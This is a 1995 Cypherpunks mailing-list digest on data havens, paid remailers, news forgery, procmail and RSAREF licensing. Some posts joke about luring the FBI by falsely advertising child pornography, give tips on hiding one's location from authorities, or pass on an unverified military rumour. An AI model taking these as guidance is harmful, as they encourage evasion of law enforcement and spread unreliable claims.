standpoint there is little difference between the two. > > As to data havens being dangerous to run...I don't know. At the recent > > HoHoCon there was a long discussion 'bout networks hidden within networks > > that was very intriguing. If Doug Barnes is reading this he may be > > willing to reiterate some of the talk. I do know that at the moment my > > That was my talk, and if I ever get around to it I will be putting my notes > and design details for underground internetworking up on the web. These > notes include the slides from the talk and the technical notes relating to > this issue... > Sorry, for the slip. From avi at clas.ufl.edu Tue Jan 10 06:18:11 1995 From: avi at clas.ufl.edu (Avi Harris Baumstein) Date: Tue, 10 Jan 95 06:18:11 PST Subject: Data Haven problems In-Reply-To: <199501100125.TAA29250@pentagon.io.com> Message-ID: <199501101418.JAA08782@cutter.clas.ufl.edu> dfloyd at io.com writes: >My problem is not that people will bitch about my DH. My problem will >be arfholes or yellow journalists uploading K*dd*e p**n to my DH, then >making a long report how I cater to p*dofiles and other evil denezins >that pop from time to time. Then, I get the police knocking at my >door, asking me to come to Club Fed for a looooonnnggg vacation. well i remember a suggestion a while back to only accept encrypted files. i don't remember who made the suggestion, but this seems like a good idea for several reasons: 1) most journalists won't know how to encrypt their files (ok, this is an admittedly short-term advantage, as journalists get smarter) 2) you will have no idea *what* is stored, and absolutely no way of finding out, even if you wanted to. you should advertise this feature widely. 3) it will help promote the use of crypto, as those who want to use the DH will have to have a way to encrypt their files. and charging, even an extremely minimal fee, will help to reduce wanton usage. but then you get into the whole electronic payment infrastructure problem again... -avi From bdolan at well.sf.ca.us Tue Jan 10 06:42:27 1995 From: bdolan at well.sf.ca.us (Brad Dolan) Date: Tue, 10 Jan 95 06:42:27 PST Subject: Response to CBS News "drive-by" attack on the internet Message-ID: <199501101442.GAA21852@well.sf.ca.us> January 10, 1995 Eric Ober President, CBS News 524 W. 57th Street New York, NY 10019 Dear Mr. Ober: In its 1/9/95 evening news broadcast, CBS aired a segment presenting a number of people who argued that the content of school libraries, written communications, and electronic communications should be censored for the common good. Since CBS did not present anyone with an opposing point of view, I assume the position presented is believed by CBS to be correct and not controversial. At first I was concerned about your network's apparent lack of support of first amendment rights to freedom of speech and of the press. Then I realized that these freedoms are only to discuss topics which could not result in physical or moral harm to anyone. I have some friends who share your concerns. They have been trying for years to reduce availability of morally dangerous materials like _The_Catcher_In_The_Rye_ and _Heather_Has_Two_Mommies_. They will be so excited to hear that you are now on their side. Sincerely, Brad Dolan bdolan at well.sf.ca.us  From storm at marlin.ssnet.com Tue Jan 10 07:37:43 1995 From: storm at marlin.ssnet.com (Don Melvin) Date: Tue, 10 Jan 95 07:37:43 PST Subject: Rumored CBS "hit" on internet coming In-Reply-To: <199501091955.LAA07671@netcom18.netcom.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199501091955.LAA07671 at netcom18.netcom.com>, you wrote: > > Argghh!! When Connie interviewed me last week, she said I could > _whisper_ some dark uses to her and it would just be between the two > of us! > > Life's a bitch, and so is Connie. I believe the current PinC expression should be Life's a Hillary, and so is Connie - -- America - a country so rich and so strong we can reward the lazy and punish the productive and still survive (so far) Don Melvin storm at ssnet.com finger for PGP key. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxKh7mvyi8p8VUiJAQHxmQP/UP733aoSsBqI23NR1p6A4Gcl79VT8Dvc cC4MpxRQZwe0w2dx7jNMpXNJY5iwMOwpXNkfY/SEX0iyGXL0B8kjHLOYJkhtOZMA 5PyPqU8fbskKz5xXd/kBeTtZmnVzi4eMFYczm4+ThWlwzEoka5PATP3pa2SSXwmc rCGsnPDuJQA= =V+K/ -----END PGP SIGNATURE----- From nsb at nsb.fv.com Tue Jan 10 07:59:27 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Tue, 10 Jan 95 07:59:27 PST Subject: for-pay remailers and FV In-Reply-To: <21043.789692792.1@nsb.fv.com> Message-ID: Excerpts from fv: 9-Jan-95 Re: for-pay remailers and FV db at Tadpole.COM (2073*) > Also, there is no reason on earth to take FV for payment under > such a scheme, No reason on Earth? Try any of the following: 1. You can actually get paid, in real money, using a system that is operating NOW. 2. It requires no special software for the user of the remailer service, thus preserving a very positive feature of most of today's anonymous remailers. 3. You don't need to have a credit card merchant account (and the technical arrangements for using it) in order to run a remailer service. There are more, but those are probably the top three. > I don't see any reason to get FV involved, unless one were so lame > as to be unable to get signed up directly with the credit card > companies as a merchant -- a process of appropriate complexity > to indicate the posession of at least one (1) clue, which is prob. > desirable in someone who's going to be handling remailer finances Well, I could be wrong, but from the above paragraph I can only infer that you've never actually tried to set yourself up as a merchant. The hardest part is getting approved for a merchant account. Unless you already have an established business or money in the bank, this will *probably* be a showstopper if you want to set up a remailer-for-pay service. Getting a merchant account is never trivial, and getting one in a whole new industry is VERY hard. Once you have a merchant account, establishing the right technical setup to do the actual authorization and purchases is not rocket science, but it certainly requires more than "1 clue" -- in particular, it typically requires hooking up some special hardware, installing and configuring some new software, and some serious thought about the implications for your system's security. None of this is needed if you use FV. Also, as Paul pointed out, the requirement for reversibility applies to ANY credit-card-based service, not just FV. This is NOT an option, it is required by law (reg Z). Excerpts from fv: 10-Jan-95 Re: for-pay remailers and FV Hal at shell.portal.com (2603) > Perhaps you could charge some small amount for them, but require VISA > payment, and check the names on the VISA cards. (This doesn't hurt > anonymity when the tokens are actually used because of the blinding.) To > get multiple tokens a person would have to commit some serious real world > name trickery, a considerably higher barrier than making up a pseudonym > on the net. This is workable. It also reinvents a big chunk of what FV does, if you do it yourself. -- NB From daleh at ix.netcom.com Tue Jan 10 08:27:05 1995 From: daleh at ix.netcom.com (Dale Harrison AEGIS) Date: Tue, 10 Jan 95 08:27:05 PST Subject: DataHavens Message-ID: <199501101626.IAA19511@ix3.ix.netcom.com> If one wonders what sort of physical threat an operator of a datahaven could potentially face, then today's (01/10/95) Wall Street Journal editorial is must reading. It's on the Op-Ed page (page A20) and is titled: "No Accountability at the FBI". It discusses the Randy Weaver siege in 1992 and the subsequent investigation and whitewash that followed. It's scary stuff! From rogaski at phobos.lib.iup.edu Tue Jan 10 08:29:28 1995 From: rogaski at phobos.lib.iup.edu (Mark Rogaski) Date: Tue, 10 Jan 95 08:29:28 PST Subject: HTTP and ID Verification Message-ID: <199501101629.LAA05969@phobos.lib.iup.edu> -----BEGIN PGP SIGNED MESSAGE----- Can anyone tell me what the URL for the site that displays all the identifying info it gets when you request it is? - ----- Doc doc at phobos.lib.iup.edu aka Mark Rogaski http://www.lib.iup.edu/~rogaski/ Disclaimer: You would probably be hard-pressed to find ANYONE who agrees with me, much less my university or employer... [finger fllevta at oak.grove.iup.edu for PGP Public Key and Geek Code v2.1] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxK1yB0c4/pqJauBAQHjjgP/VsewWr3MtyULjeb1H1SF7FEHBLK4rtML dHEGG88AOPI4C6shO/xpn7fauZM4serMt2OkXXoXcKjc4DXXnrRB23NUhWXXwEBl iIWucy4p6FEBzKLPv3ulmNRzl+JBsKvNdFTVvYiutFmagA1W/t9WCon+p1eEurnK LlBNqcnL+Rk= =DdD8 -----END PGP SIGNATURE----- From nelson at crynwr.com Tue Jan 10 08:30:24 1995 From: nelson at crynwr.com (Russell Nelson) Date: Tue, 10 Jan 95 08:30:24 PST Subject: for-pay remailers and FV In-Reply-To: Message-ID: Date: Tue, 10 Jan 1995 10:57:56 -0500 (EST) From: Nathaniel Borenstein The hardest part is getting approved for a merchant account. I've tried. Nathan is right. Also, as Paul pointed out, the requirement for reversibility applies to ANY credit-card-based service, not just FV. This is NOT an option, it is required by law (reg Z). But if you sell services or information, this is not a really big problem. You just say "fuck it, I got screwed", and you reverse the charges. And as for anonymity/privacy, if the business is doing a lot of other transactions, and the remailer ones are mixed in, then who's to say who's who? Maybe it's time to remind people that there is no such thing as perfect security, only varying degrees of such. -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From nelson at crynwr.com Tue Jan 10 08:34:48 1995 From: nelson at crynwr.com (Russell Nelson) Date: Tue, 10 Jan 95 08:34:48 PST Subject: DH testing Message-ID: A DataHaven is only as good as it's been tested. You could pay for a tiger team to attack it, but why bother? Just take some nudie pictures of a girl >=18 years old who looks <18 years old, announce publicly that you have kiddie porn for sale, sit back and let the FBI test your DH for free. Be sure to charge enough for your eventual legal defense... -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From nelson at crynwr.com Tue Jan 10 08:42:02 1995 From: nelson at crynwr.com (Russell Nelson) Date: Tue, 10 Jan 95 08:42:02 PST Subject: "safe" Internet access Message-ID: If you want to access the Internet in a way that doesn't reveal your physical location (much), buy access from Metricom. They sell Internet access via radios. A small part-15 (900Mhz) $500 radio modem is needed, plus a few dozen bucks/month (thereabouts). If you use a yagi antenna, that will reduce your emissions to mostly one direction. If you're in line-of-sight with one of their poletops, you can point a telescope in that direction, and transmit only when you *don't* see a truck bristling with antennas. Every radio has a serial number, and they record who's got what, so they could cut you off much, much easier than catching you. For more information, see . Same thing can be done with radiomail, but the speed is slower and the radios and service are more expensive. And, they can still cut you off. Of course, part-time connectivity is problemmatic, because you need to receive mail at all times. Of course, you could use a mail hub in a "safe" country, but then you're tied to a government again. -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From mpd at netcom.com Tue Jan 10 08:44:22 1995 From: mpd at netcom.com (Mike Duvos) Date: Tue, 10 Jan 95 08:44:22 PST Subject: Fwd: Re: netcom discussion in news.admin.misc In-Reply-To: <199501100351.TAA05721@ix3.ix.netcom.com> Message-ID: <199501101633.IAA07416@netcom19.netcom.com> johndix at ix.netcom.com (John Dix) writes: > I've mentioned to Netnews that a good first step would be to > make it harder to forge messages by changing the news > software to no longer accept a user-supplied "Sender:" line > in the article header, and he has agreed. However, I fail > to understand just *what* is taking so long to make this > (much needed) change. The problem here is that the news transport mechanism is not particularly resistant to arbitrary text being posted by a user. Newsreaders can check for forged "From:" or "Sender:" lines, but newsreaders then call shell scripts like inews and injnews to process their material. Users can call these scripts directly and bypass any checks by the newsreader. None of this requires any special privs, and only the lowest level of the news transport mechanism, relaynews, requires set-user-id netnews to function. The latest version of Tin does check for forged "From:" lines, but the version Netcom runs allows anything to be posted. Fudging the lower levels of the news transport mechanism to check "From:" and "Sender:" lines can mess up other things, since processes may need to inject news into the news stream which they themselves did not author. One solution to the problem is to have a secure level of the news transport mechanism add an "Originator:" line to every message which it handles. This will identify users attempting forgeries, and will not require munging of an existing header line. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From mpd at netcom.com Tue Jan 10 08:47:54 1995 From: mpd at netcom.com (Mike Duvos) Date: Tue, 10 Jan 95 08:47:54 PST Subject: Julf gets some negitive press!!! In-Reply-To: Message-ID: <199501101646.IAA09037@netcom19.netcom.com> skaplin at mirage.skypoint.com (Samuel Kaplin) writes: > bitch Siegel is complaining about net hoods again, ... > Such problems are further exacerbated by a computer in > Finland called the Anonymous Server, which exists for the > sole purpose of laundering computer messages, much like > dirty money is laundered through small island nations. I predicted a while back, that when the time came for a serious attack by authority types on anonymous remailers, we would see the term "message laundering" suddenly spring into the public lexicon. > Consequently, if you want to, say, threaten someone with > death, your risk of retribution is small, courtesy of the > Anonymous Server. Well, I certainly wouldn't post death threats through Penet. At the very least, it would threaten the existance of the server, which is a valuable net.resource, and cause me to receive nasty mail from Julf. I think Bitch Siegel exaggerates the potential danger of this particular system. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From nesta at nesta.pr.mcs.net Tue Jan 10 08:51:29 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Tue, 10 Jan 95 08:51:29 PST Subject: Data Haven problems In-Reply-To: <199501101418.JAA08782@cutter.clas.ufl.edu> Message-ID: On Tue, 10 Jan 1995, Avi Harris Baumstein wrote: > dfloyd at io.com writes: > > >My problem is not that people will bitch about my DH. My problem will > >be arfholes or yellow journalists uploading K*dd*e p**n to my DH, then > >making a long report how I cater to p*dofiles and other evil denezins > >that pop from time to time. Then, I get the police knocking at my > >door, asking me to come to Club Fed for a looooonnnggg vacation. > > well i remember a suggestion a while back to only accept encrypted > files. i don't remember who made the suggestion, but this seems like a > good idea for several reasons: > I like this too, it keeps the data safe not only in transit, but also on the site itself. So I don't have to re-encrypt files, they are alredy crypted, and signed(another good bonus) by the sender or account holder. > 2) you will have no idea *what* is stored, and absolutely no way of > finding out, even if you wanted to. you should advertise this feature > widely. depends on how it is encrypted, if they encrypt it too the datahaven, using your public key, that argument won't work, BUT if they are suing it as a anon drop box, then they can encypt it to another publik key of the recipient(an anon key of course) and oyu would never be abl to read it. This is a good feature of a data-haven, one that may be able to produce profit int eh future if tha is a motive. From RGRIFFITH at sfasu.edu Tue Jan 10 08:52:58 1995 From: RGRIFFITH at sfasu.edu (RGRIFFITH at sfasu.edu) Date: Tue, 10 Jan 95 08:52:58 PST Subject: procmail: another question Message-ID: <01HLOG4V1I1E00106V@TITAN.SFASU.EDU> Please excuse my ignorance, but will procmail run under DOS? Will it download mail from a PopMail server? From anonymous-remailer at shell.portal.com Tue Jan 10 09:33:17 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Tue, 10 Jan 95 09:33:17 PST Subject: Anarcho-Cap - Newt and Gorby? Message-ID: <199501101733.JAA21222@jobe.shell.portal.com> ## From: sherbock at remailer.net -----BEGIN PGP SIGNED MESSAGE----- Crypto-anarchy, many-to-many communications, inter- national/cultural communications, bandwidth price plummet, computer ubiquity, philosophical/ideological evangelism, freedom of speech/trade/association and other factors talked about on this list are together heralding huge transformations. With this as background together with the statement that I am somewhat of a "Frissell/Sandforth Optimist," let me present a short essay and ask a single political question. I want to propose that a change to more of a Snow Crash society with anarcho-capitalism as the norm is not necessarily being _caused_ by pressures listed above, but, rather, fit a grander historical destiny. What we are seeing and will see in the information age has been bound to happen all along. It is an inevitable follow-on phase to our industrial age. One way to view our (Cypherpunks) work is "lead, follow or get out of the way." What's happening is going to happen. I just want to be in the center of it! (I could write much more in support of this. Read Gilder, Rees-Mogg, etc. and much of the techno Sci-Fi suggested by Cypherpunks.) Hindsight is 20/20. Many experts have analyzed the collapse of the USSR. Many are quick to claim that the dissolution was inevitable, historical, even. Consider the possibility that the dissolution of large, centralized federal republics is also inevitable. (The Frissel/Sandforth Optimists have been arguing this exact point.) As an interesting specific, consider parallels in the roles of former Soviet leader Mikhail Gorbachev and the U.S. House Speaker Newt Gingrich. Gorbachev, by self-proclamation, was a communist first and foremost. He was in no way a destructionist. In fact, it can be argued that he never intended to weaken the central power of the Supreme Soviet. He introduced liberalization reform (parestroika?) with the intent only of heading off the foreboding economic collapse of his State. Gorbachev's reforms were little baby walking steps in a direction that the Bear already was poised to _run_. Mr. Gingrich is a REPUBLICan. From what I can see, he loves the Constitutional government process of the United States. His proclaimed intentions are for downsizing and deregulation. However, he does not seem to desire the dissolution of federal, central government. He has not openly claimed to be libertarian or anarcho-capitalistic. :) Will Newt's deregulatory reforms be baby walking steps in the direction Uncle Sam (and the world) is already poised to _run_? G. del Sherbock - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQBNAy8RoncAAAECAK5jkuO+3qNE4veGXrwKqgJs9GhJibpNBOOacLN/OueiDX4R w0+fvCNCwIGT49T6acJvgSb/Kej3BcJViw4fkRUABRG0D0cuIGRlbCBTaGVyYm9j aw== =RPy1 - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBLxKvjAXCVYsOH5EVAQEXHQH+IT6n/vth2UcQrhJ9faEn8nfwU/XA/OyL 3qfXso1b7/NoivfSiuAvI8wQHasXQsWOheSwTE9c/TI7w6gAX4Yltw== =TJqU -----END PGP SIGNATURE----- From eric at remailer.net Tue Jan 10 10:11:37 1995 From: eric at remailer.net (Eric Hughes) Date: Tue, 10 Jan 95 10:11:37 PST Subject: RSA Licenses Commercial Distribution Rights to RSAREF (URLs to PressRelease) Message-ID: <199501101810.KAA26946@largo.remailer.net> I've been waiting for this, for oh, about two years now. Eric ----------------------------------------------------------------------------- RSA Licenses Commercial Distribution Rights to RSAREF ===================================================== RSA announces that it is licensing commercial distribution rights of its RSAREF software to Consensus Development, allowing for implementation of commercial Privacy Enhanced Mail (PEM) applications. Press Release -------------- REDWOOD SHORES, CALIFORNIA--JANUARY 9, 1995--RSA Data Security, Inc. and Consensus Development Corporation jointly announce today at the RSA Data Security Conference that Consensus Development is licensing the commercial distribution rights of RSAREF from RSA Data Security. RSAREF (pronounced "R.S.A. reff") is short for "RSA reference implementation" and is a cryptography source code toolkit designed to allow developers to create PEM (Privacy-Enhanced Mail)software and other encryption/authentication tools. Until now, RSAREF has been an unsupported RSA product approved for use only as part of freeware and not-for-profit software applications. Consensus Development will now be able to market and license RSAREF to commercial software developers, and provide software support and future enhancements to the RSAREF source code library. (continued in full text press release...) Full Text --------- A World-Wide-Web/Mosaic page for this press release can be found at: A digitally signed text copy of this press release can be found at: Discussion/Announcement List ---------------------------- Consensus Development will be creating an email discussion list for software developers interested in RSAREF. To join the discussion, send a message to with the body of the message requesting "subscribe RSAREF-DEV-L firstname lastname". From adam at bwh.harvard.edu Tue Jan 10 10:19:52 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Tue, 10 Jan 95 10:19:52 PST Subject: RSA Licenses Commercial Distribution Rights to RSAREF (URLs to Press In-Reply-To: <199501101810.KAA26946@largo.remailer.net> Message-ID: <199501101821.NAA15802@hermes.bwh.harvard.edu> Its just another example of RSADSI trying to act more like a government agency. :) Adam | I've been waiting for this, for oh, about two years now. | | Eric | ----------------------------------------------------------------------------- | | RSA Licenses Commercial Distribution Rights to RSAREF | ===================================================== From adam at bwh.harvard.edu Tue Jan 10 10:23:52 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Tue, 10 Jan 95 10:23:52 PST Subject: procmail: another question In-Reply-To: <01HLOG4V1I1E00106V@TITAN.SFASU.EDU> Message-ID: <199501101826.NAA15838@hermes.bwh.harvard.edu> You wrote: | Please excuse my ignorance, but will procmail run under DOS? Will it | download mail from a PopMail server? Procmail will run on the UNIX system that you connect to via pop. It processes mail, it doesn't transport it. (It can, of course, hand mail off to an MTA.) Procmail is a very versatile, relatively easy to use way of processing mail. Its most obvious function is to put mailing lists into one or several folders, but it also can be made into a file server*, automatically retrieve PGP keys, act as a basic remailer, etc, etc. Adam *RTFM: procmailex(5) -- "It is seldom that liberty of any kind is lost all at once." -Hume From cactus at seabsd.hks.net Tue Jan 10 11:20:14 1995 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Tue, 10 Jan 95 11:20:14 PST Subject: Storm Signals Message-ID: <199501101924.OAA29627@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- On a social mailing list that I'm on, two things have been noticed in the last week: 1: Somebody's roommate (a Green Beret) has been called back into 6 months of active service. He was not told where he'd be. 2: GPS fine positioning has been turned off. This is only done during times of military operations (such as the 'invasion' of Haiti and the Iraq Massacre). It's also been highly correlated with Pentagon pizza deliveries. Anybody else have any clues as to what's up? No overt crypto relevence, but some parallels to traffic analysis could be easily drawn. - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxKkJhNhgovrPB7dAQGCqwP/YzFcuNDCoUDY4a8O5YuVryBZ51HisN6m PHwc5W2bmwXx8LLQs1fOu8J9d3SFZM8l47bBj8EZCIvXatrUCHPVIqnBWfE30z8w 7uQRBn+eTtct/vs9MgPTGDk+mNWgDtYHL7TQ8vfypkYVgrlWH3pNbEs4+EkRv/5l ayYaAPq3IoU= =YUo1 - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxLe7CoZzwIn1bdtAQHEcgGAm0rMUiMy+5bUX419XmkLtHFXNUjvV8e0 1YylcQ5G9C/HlWXYZett0tudtpBUGZsS =kfFB -----END PGP SIGNATURE----- From ChristopherA at consensus.com Tue Jan 10 11:25:32 1995 From: ChristopherA at consensus.com (Christopher Allen) Date: Tue, 10 Jan 95 11:25:32 PST Subject: RSA Licenses Commercial Distribution Rights to RSAREF (URLs to Press Message-ID: At 10:21 AM 1/10/95, Adam Shostack wrote: > Its just another example of RSADSI trying to act more like a >government agency. :) I hope not -- one thing that I'm trying to do by taking over support for RSAREF is make it much more responsive to what developers demand. Like you I was disappointed by the slow progress of RSAREF, so that is why I worked so hard to get this deal going. ------------------------------------------------------------------------ ...Christopher Allen Consensus Development Corporation.. ... 4104-24th Street #419.. ... San Francisco, CA 94114-3615.. ... o415/647-6383 f415/647-6384.. ...Mosaic/WWW Home Page: .. ...Consensus Home Page .. From jamesd at netcom.com Tue Jan 10 11:27:40 1995 From: jamesd at netcom.com (James A. Donald) Date: Tue, 10 Jan 95 11:27:40 PST Subject: procmail: another question In-Reply-To: <199501101826.NAA15838@hermes.bwh.harvard.edu> Message-ID: On Tue, 10 Jan 1995, Adam Shostack wrote: > Procmail is a very versatile, relatively easy to use way of > processing mail. "Relatively easy" -- Relative to the usual venomous Unix user hostile interface that is. I use procmail, but my local Unix guru does not, even though he has a clear need to do so. > Its most obvious function is to put mailing lists > into one or several folders, but it also can be made into a file > server*, automatically retrieve PGP keys, act as a basic remailer, > etc, etc. The .procmailrc file is in effect a program, rather than a bunch of flags. Every time procmail receives a message it interpretively executes this program, which does a pattern match on the mail, if it gets a match, passes the mail to some external program, which may be yet another invocation of procmail executing a different .rc file. Now if us windows folk had done it, we would have done it as visual basic controls and we would have created an installation program. Still I must confess, we windows folk have not done it and the unix folk have done it, so I guess it is score 1 for unix, 0 for windows. But I guarantee the chairman of the board is not going to use procmail. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from http://nw.com/jamesd/ the arbitrary power of the omnipotent state. jamesd at netcom.com From 71431.2564 at compuserve.com Tue Jan 10 11:40:48 1995 From: 71431.2564 at compuserve.com (Bradley W. Dolan) Date: Tue, 10 Jan 95 11:40:48 PST Subject: Why is WELL down? Message-ID: <950110193426_71431.2564_FHJ103-1@CompuServe.COM> My favorite net access provider, the WELL, is down and I can't get a straight answer from the normally frank WELL folks why. Is there a net.guru out there that might have any insight into whether this shutdown is technical or political? Brad Dolan From jef at ee.lbl.gov Tue Jan 10 11:58:51 1995 From: jef at ee.lbl.gov (Jef Poskanzer) Date: Tue, 10 Jan 95 11:58:51 PST Subject: Why is WELL down? Message-ID: <199501101958.LAA07295@hot.ee.lbl.gov> >My favorite net access provider, the WELL, is down and I can't >get a straight answer from the normally frank WELL folks why. Is that sarcasm? "Never attribute to malice what can be explained by simple stupidity." --- Jef From danisch at ira.uka.de Tue Jan 10 12:22:06 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Tue, 10 Jan 95 12:22:06 PST Subject: "safe" Internet access Message-ID: <9501102021.AA04063@elysion.iaks.ira.uka.de> > If you want to access the Internet in a way that doesn't reveal your > physical location (much), buy access from Metricom. They sell > Internet access via radios. A small part-15 (900Mhz) $500 radio modem This seems to be one of these devices which use the celular phone network. In Germany they are also available ("Modacom") and use the D1/D2/E-Plus networks. These networks can localize a sender in many cases with a precision of about 20-40 meters. Not the best way to keep the physical location secret... Hadmut From adam at bwh.harvard.edu Tue Jan 10 12:25:13 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Tue, 10 Jan 95 12:25:13 PST Subject: procmail: another question In-Reply-To: Message-ID: <199501102026.PAA16836@hermes.bwh.harvard.edu> | On Tue, 10 Jan 1995, Adam Shostack wrote: | > Procmail is a very versatile, relatively easy to use way of | > processing mail. | | "Relatively easy" -- Relative to the usual venomous Unix | user hostile interface that is. I use procmail, but my | local Unix guru does not, even though he has a clear need to do so. Its got a nasty learning curve; I held off for a long time before making the leap. What all mail filters need is better integration with MUAs, so I can say "This message should have gone into my cpunks-noise folder, fix the rules." Of course, doing that really well is not trivial. Safe-tcl has a shorter learning curve, but I've spend enough time that I don't want to switch without a payoff. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From erc at s116.slcslip.indirect.com Tue Jan 10 13:07:42 1995 From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin]) Date: Tue, 10 Jan 95 13:07:42 PST Subject: "safe" Internet access In-Reply-To: Message-ID: > Of course, part-time connectivity is problemmatic, because you need to > receive mail at all times. Of course, you could use a mail hub in a > "safe" country, but then you're tied to a government again. If you batch your email and news using UUCP, you don't need to be connected all the time. And it can also be encrypted... -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi ** PGP encrypted email preferred! ** "What's the use of distant travel if only to discover - you're homeless in your heart." --Basia, "Yearning" From tcmay at netcom.com Tue Jan 10 13:18:28 1995 From: tcmay at netcom.com (Timothy C. May) Date: Tue, 10 Jan 95 13:18:28 PST Subject: MEETING: Jan. 14th Bay Area Cypherpunks Meeting Message-ID: ANNOUNCEMENT ============ This month's Bay Area Cypherpunks Meeting will be held this Saturday, January 14th, from 12 noon until 6 pm in Silicon Graphics Cafe Iris, the usual place and time. Detailed directions are at the end of this message. The topic: Demonstrations The emphasis will be on hands-on, live demonstrations of items of interest. Several speakers will demonstrate products and tools on actual machines. I encourage eating, shmoozing, and general milling-around to be finished by 12:30 at the latest, so we can start discussion of general items, updates, etc. I'd really like to get the demos started by 1 p.m., and 1:30 at the latest. We have a lot of demos planned and some special visitors in town this week, and some special events that just happened. So, as I'm the rotating chairentity this month, I'll wield the gavel ruthlessly. The RSA Data Security Inc. annual conference happened this past week, so I expect several folks will want to provide updates and news announcments, e.g., the licensing of RSAREF, status of lawsuits, new results, etc.. Short updates are good, but we just don't have the time for this meeting to formally present recaps of interesting papers. If there were any *amazing* results, they'll surely keep for a future meeting for more detailed discussion (could be a theme for a meeting). Also, Phil Zimmermann may be at the meeting (he's scheduled), so hearing from him could easily soak up a couple of hours, which we just don't have. In fairness to those who've planned demos, we'll have to try to limit all these interesting folks to the first hour or so. Maybe a few minutes more. And maybe later in the day there'll be time. We have these demos planned. * Henry Strickland (Strick) will, in his words, "be demoing Skronk (transparent above-the-kernel encryption for TCP/IP) and Kudzu (the TCL toolkit)." * Jack Repenning of SGI will demo two interfaces. In his own words, "I'm planning to demo two interfaces, actually: the Emacs one (on an Indy), and the MCIP "MacPGP Kit" plus Eudora extensions, on a Mac." * Phil Zimmermann "will demo pgp 2.9 and possibly voice pgp," according to Katy Kislitzin, who is in contact with Phil. * Katy Kislitzin will bring up the "demo smosaic" she has. (Secure Mosaic.) * Raph Levien will demonstrate "premail," his remailer-chaining tool. * Other ad hoc demos of items of interest may happen. We'll have several machines set up, so those with interesting software or hardware can perhaps do some brief, unscheduled demos. If I left anyone out, anyone who sent me e-mail saying they wanted to demo, I apologize. I went back over my mail and these were the folks I found who'd sent me e-mail. Contact me at my normal e-mail address (tcmay at netcom.com) as soon as possible if you want to be added. (I'll be travelling to LA on Friday, for a television interview with the BBC on crypto, and so will be unwired that day.) The emphasis is on hands-on demos, to expose folks to tools, capabilitities, possible future products. Informality is fine. NOTE TO PRESENTERS: Make arrangements to have machines you'll need there. An SGI Unix machine is permanently in the room. Other machines will have to be brought. Because of my trip to LA on Friday, I doubt I'll be bringing my PowerMac 7100AV with me, but I will have a PowerBook 170 laptop Macintosh, if all else fails. Windows and DOS demo folks should bring their machine of choice. (Atari, Cromemco, Amiga, Altair, and Exidy Sorcerer users are of course on their own.) The overhead video system is often more trouble than its worth, but it will be available for at least some of the demos. Those wishing to tie into should have either RGB outputs from their machine, or NTSC composite video. I'll bring my Hi-8 camcorder, which can tie in, and thus allow me to zoom in on whatever machines are there and display the video on the overhead screen. Dinner plans will, as usual, be made in the last chaotic moments of the meeting. ----------------------------------------------------------------------------- DIRECTIONS: Silicon Graphics, Inc. Building 5 (SGI Cafeteria) 2025 North Shoreline Boulevard Mountain View, CA >From 101 take Shoreline East. This is towards Shoreline Amphitheatre. It's also "logical east", and points more north that east. (That is, it's east with respect to 101 North, which points west near the exit.) If you're coming in on 101 South, you'll cross over the bridge. Continue on Shoreline and go past a whole bunch of other SGI buildings. Turn right onto Steirlin Court at the big red metal sculpture. There will be even more SGI buildings surrounding you--take note of the building numbers. Go almost to the end of this street. Building 5 is on the right. From cactus at hks.net Tue Jan 10 13:34:06 1995 From: cactus at hks.net (L. Todd Masco) Date: Tue, 10 Jan 95 13:34:06 PST Subject: Crypto functions Message-ID: <199501102139.QAA00961@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- What crypto functions are considered modern and usable? The list I have right now is: RSA IDEA DES 3DES RC4 RC5 BLOWFISH MD4 MD5 (and FLAMINGO, a trivial test case, which consists of xor'ing every 8 chars with "flamingo".) Pointers to code for any other schemes will be greatly appreciated. Thanks, -- Todd - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 